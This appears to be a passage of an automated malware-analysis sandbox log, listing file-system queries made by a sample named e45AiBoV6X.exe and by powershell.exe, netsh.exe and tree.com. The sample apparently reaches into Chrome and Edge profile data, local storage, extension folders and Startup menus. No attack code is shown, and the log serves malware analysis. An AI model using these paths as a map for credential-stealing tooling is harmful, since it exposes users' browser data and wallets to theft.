Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
